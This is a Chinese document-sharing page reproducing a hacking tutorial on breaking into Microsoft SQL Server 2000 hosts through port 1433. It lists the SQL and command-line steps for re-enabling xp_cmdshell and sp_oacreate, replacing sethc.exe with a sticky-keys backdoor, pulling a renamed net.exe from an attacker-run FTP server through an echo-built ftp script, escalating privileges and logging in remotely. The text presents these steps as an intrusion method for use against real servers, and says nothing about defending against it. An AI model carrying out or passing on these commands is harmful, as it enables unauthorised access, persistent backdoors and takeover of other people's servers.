利用SQL之1433端口巧妙入侵服务器.docx
- 文档编号:15504813
- 上传时间:2023-07-05
- 格式:DOCX
- 页数:13
- 大小:1.24MB
利用SQL之1433端口巧妙入侵服务器.docx
《利用SQL之1433端口巧妙入侵服务器.docx》由会员分享,可在线阅读,更多相关《利用SQL之1433端口巧妙入侵服务器.docx(13页珍藏版)》请在冰点文库上搜索。
利用SQL之1433端口巧妙入侵服务器
利用SQL之1433端口巧妙入侵服务器
利用1433端口提权
相信大家扫到很多1433都提示用netnet1提权都说拒绝访问!
且又无法上传!
今天给大家针对Net没权限情况的提权方法;
1、未找到储存过程!
那就来修复下吧!
用到SQL语句:
xp_cmdshell新的恢复办法
第一步先删除:
dropproceduresp_addextendedproc
dropproceduresp_oacreate
execsp_dropextendedproc'xp_cmdshell'
第二步恢复:
dbccaddextendedproc("sp_oacreate","odsole70.dll")
dbccaddextendedproc("xp_cmdshell","xplog70.dll")
直接恢复,不管sp_addextendedproc是不是存在
图1
2、修复好了!
又出现问题了!
xplog70.dll被删除了!
看来只有用授鱼的那修复法!
图2
3、d:
\应用软件\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL
找到了哈哈!
图3
4、恢复!
用到SQL语句:
第一
execsp_dropextendedproc'xp_cmdshell'
第二
dbccaddextendedproc("xp_cmdshell","d:
\应用软件\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL")
恢复好了
图4
5、提下权netnet1都拒绝访问!
管理降低了权限!
图5
6、于是我想到了后门提权!
居然管理也注意到了后门!
写了权限!
用到CMD命令:
五shift键(前提是能执行DOS命令,并且sethc.exe没加保护)一般只要执行第一步!
copyC:
\WINDOWS\explorer.exec:
\windows\system32\sethc.exe
copyC:
\WINDOWS\explorer.exec:
\windows\system32\dllcache\sethc.exe
图6
7、插入一点:
如果DOS不能执行命令的话!
那就用SQL执行替换命令!
(成功率比较低!
)
用到SQL语句:
利用SQL分析器开shift后门(一般只要执行第一步!
然后进入后,替换自己的后门)
第一:
declare@oint
execsp_oacreate'scripting.filesystemobject',@oout
execsp_oamethod@o,'copyfile',null,'C:
\WINDOWS\explorer.exe','c:
\windows\system32\sethc.exe';
第二:
declare@ooint
execsp_oacreate'scripting.filesystemobject',@ooout
execsp_oamethod@oo,'copyfile',null,'c:
\windows\system32\sethc.exe','c:
\windows\system32\dllcache\sethc.exe';
图7
8、这里是本节的重点了!
利用传马的方式提权!
首先自己架设一个FTP或是自己已经有FTP的!
把本机的net放到FTP空间里去!
随便改个名字!
切记不要和net相同即可!
把FTP传马方式的语句一句一句复制执行DOS命令!
用到CMD命令:
echoopenFTP>xiuxiu.txt 注意xiuxiu.txt你可以随意改!
但是要和下的相同!
echo帐号>>xxxx.txt
echo密码>>xxxx.txt
echobinary>>xxxx.txt
echogetnet的名字.exe>>xxxx.txt
echobye>>xxxx.txt
ftp-s:
xxxx.txt
delxxxx.txt./q/f
图8
9、好了!
执行下最后一条命令!
嘿嘿!
发现和FTP抓鸡方式一样!
有鸡来下载!
图9
10、好了!
最后一条命令执行成功了!
返回以下数据!
注意:
服务器必须能上网!
图10
11、我XXxX我自己的net好象没加权限吧!
居然不能执行
返回了以下数据!
发生系统错误5...这很多人都遇见过!
其实可以省掉一部分!
以后提权传net的时候不要传net直接net1
因为所以!
我也解释不清楚!
图11
12、嘿嘿net1后成功了!
提权成功!
图12
13、远程登录成功
图13
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 利用 SQL 1433 端口 巧妙 入侵 服务器